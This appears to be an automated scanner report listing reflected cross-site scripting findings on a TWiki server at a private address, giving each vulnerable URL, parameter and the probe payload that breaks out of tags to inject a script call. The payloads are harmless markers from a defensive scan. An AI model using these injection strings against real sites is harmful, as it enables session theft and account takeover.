This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context, allowing the attacker to access any cookies or session tokens retained by the browser.
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/twiki/bin/view/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?rev=1.22 | Target: http://192.168.105.200/twiki/bin/view/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?rev=1.22%3C%2Ftitle%3E%3CScRiPt %3EPJMk(5514)%3C%2FScRiPt%3E exists Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability payload: </title><ScRiPt >PJMk(5514)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WebTopicViewTemplate?rev=r1.6 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WebTopicViewTemplate?rev=r1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >uHyf(1161)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore&param1=1.4&param2=1.4 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore&param1=1.4&param2=1.4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >iFJK(9156)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >hOfO(2848)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicViewTemplate?rev1=1.6&rev2=1.5 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicViewTemplate?rev1=1.6&rev2=1.5 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >cYAl(3179)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore&param1=1.8&param2=1.8 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore&param1=1.8&param2=1.8 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >cAZV(3809)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >vhSe(9488)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore&param1=1.13&param2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore&param1=1.13&param2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >gLxV(2864)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >sbMS(7039)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ojIr(7820)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >lVtk(9498)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >xMGa(3620)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >GmTl(7015)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >osKd(9499)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev1=1.18&rev2=1.17 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev1=1.18&rev2=1.17 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >tybb(7137)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >VDVU(9666)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore&param1=1.4&param2=1.4 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore&param1=1.4&param2=1.4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >iFJK(9156)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore&param1=1.121&param2=1.121 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore&param1=1.121&param2=1.121 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >ocyo(2010)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiWordzXXHVlcqHCKC?rev2=1.1&rev1=1.10 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiWordzXXHVlcqHCKC?rev2=1.1&rev1=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >uetF(4595)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >pgay(2113)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/TWikiTutorial?rev=r1.13 | Target: http://192.168.105.200/twiki/bin/view/TWiki/TWikiTutorial?rev=r1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >Qihl(8987)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >cKPZ(3310)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >CWgd(4435)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiNotation?rev1=1.3&rev2=1.2 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiNotation?rev1=1.3&rev2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >UiBV(7883)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev=r1.7 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev=r1.7 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</td><ScRiPt >nXWr(6563)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore&param1=1.6&param2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore&param1=1.6&param2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >MZlm(4554)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore&param1=1.8&param2=1.8 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore&param1=1.8&param2=1.8 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >cAZV(3809)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsupload&param1=view.ppt | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsupload&param1=view.ppt has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >tTtd(9970)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore&param1=1.2&param2=1.2 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore&param1=1.2&param2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ZMdq(7895)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/MainFeatures?rev=r1.13 | Target: http://192.168.105.200/twiki/bin/view/TWiki/MainFeatures?rev=r1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >Ygnk(9005)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >DdrR(9224)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >tBHH(5667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >WISF(5898)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >tBHH(5667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >iIiV(8860)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.38&rev2=1.37 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.38&rev2=1.37 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >HhLm(2117)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >YKow(2102)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore&param1=1.12&param2=1.12 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore&param1=1.12&param2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >dial(4055)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore&param1=1.35&param2=1.35 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore&param1=1.35&param2=1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >TntV(1629)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore&param1=1.18&param2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore&param1=1.18&param2=1.18 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Yqgf(1667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >OuiG(1689)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore&param1=1.42&param2=1.42 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore&param1=1.42&param2=1.42 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >cYQR(9849)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore&param1=1.120&param2=1.120 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore&param1=1.120&param2=1.120 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >qyDI(7224)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >djZh(6990)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopstopicexists | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopstopicexists has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >TRQj(4977)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >zlhC(1656)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore&param1=1.7&param2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore&param1=1.7&param2=1.7 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >ChnX(7517)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >OuiG(1689)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore&param1=1.13&param2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore&param1=1.13&param2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >MSdo(9700)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore&param1=1.6&param2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore&param1=1.6&param2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >TtSL(6019)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/TWikiSystemRequirements?rev=r1.35 | Target: http://192.168.105.200/twiki/bin/view/TWiki/TWikiSystemRequirements?rev=r1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >Swns(1074)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/MainFeatures?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/MainFeatures?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >Oolg(6307)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >VJdm(8140)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >rdLY(8587)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev1=1.10&rev2=1.9 | Target: http://192.168.105.200/twiki/bin/rdiff/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev1=1.10&rev2=1.9 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >vSMj(5644)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev1=1.10&rev2=1.9 | Target: http://192.168.105.200/twiki/bin/rdiff/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev1=1.10&rev2=1.9 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >vSMj(5644)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore&param1=1.18&param2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore&param1=1.18&param2=1.18 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >VQVr(3209)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >VYHS(9431)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev1=1.7&rev2=1.6 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev1=1.7&rev2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >nGCz(5657)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore&param1=1.13&param2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore&param1=1.13&param2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >MSdo(9700)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore&param1=1.7&param2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore&param1=1.7&param2=1.7 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ChnX(7517)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >KFDg(1578)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebSiteToolsHnuxrfHrpDye?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebSiteToolsHnuxrfHrpDye?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >nVwF(9576)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore&param1=1.6&param2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore&param1=1.6&param2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >uoPe(4619)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >sCPs(7861)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >cKPZ(3310)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >DdrR(9224)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore&param1=1.121&param2=1.121 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore&param1=1.121&param2=1.121 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ocyo(2010)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev=r1.18 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev=r1.18 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >Ohcj(6605)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev2=1.1&rev1=1.35 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev2=1.1&rev1=1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >fzqk(9382)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore&param1=1.34&param2=1.34 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore&param1=1.34&param2=1.34 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >yvZt(2061)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore&param1=1.2&param2=1.2 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore&param1=1.2&param2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >ZMdq(7895)</ScRiPt> |
